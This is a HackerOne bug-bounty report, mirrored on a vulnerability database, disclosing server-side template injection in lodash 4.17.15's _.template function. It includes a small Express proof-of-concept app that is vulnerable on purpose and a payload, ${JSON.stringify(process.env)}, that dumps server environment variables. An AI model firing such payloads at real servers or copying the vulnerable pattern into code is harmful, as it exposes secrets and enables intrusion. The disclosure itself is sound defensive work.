Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneZerohexH1:904672
HistoryJun 22, 2020 - 6:16 a.m.

Node.js third-party modules: Server-side Template Injection in lodash.js

2020-06-2206:16:28
zerohex
hackerone.com
17
JSON

I would like to report Server-side Template Injection in lodash.js (_.template function)
It allows the execution of code on the server

Module

module name: lodashversion:4.17.15npm page: https://www.npmjs.com/package/lodash

Module Description

The Lodash library exported as Node.js modules.

Module Stats

26,664,631 weekly downloads

Vulnerability

Vulnerability Description

The _.template function of the lodash package does not properly validate user-supplied input.

An application making use of the lodash package may be exploited by an attacker that controls the value of a parameter processed by the _.template function. An attacker can inject code such as Javascript within parenthesis for example parameter=${JSON.stringify(process.env)} which will be executed by the server.

Steps To Reproduce:

Step 1: Create a test application that requires the lodash.js library. The application below accepts user-supplied input in the ‘name’ parameter that is handled by lodash _.template function

const express = require('express');
const _ = require('lodash');
const escapeHTML = require('escape-html');
const app = express();
app.get('/', (req, res) => {
  res.set('Content-Type', 'text/html');
  const name = req.query.name
  // Create a template from user input
  const compiled = _.template("Hello " + escapeHTML(name) + ".");
  res.status(200).send(compiled());
});

app.listen(8000, () => {
  console.log('POC app listening on port 8000!')
});

Step 2: Visit the vulnerable application at http://127.0.0.1:8000/?name=Test

Step 3: Visit the vulnerable application and enter a payload such as ${JSON.stringify(process.env)} into the name parameter e.g. http://127.0.0.1:8000/?name=Test${JSON.stringify(process.env)}

Supporting Material/References:

  • OSX 10.15.5
  • NODEJS v10.16.0
  • NPM v 6.9.0

Wrap up

  • I contacted the maintainer to let them know: [Y/N] N
  • I opened an issue in the related repository: [Y/N] N

> Hunter’s comments and funny memes goes here

Apologies if I haven’t used the ideal terminology or if this is a duplicate.

Impact

Remote code execution

JSON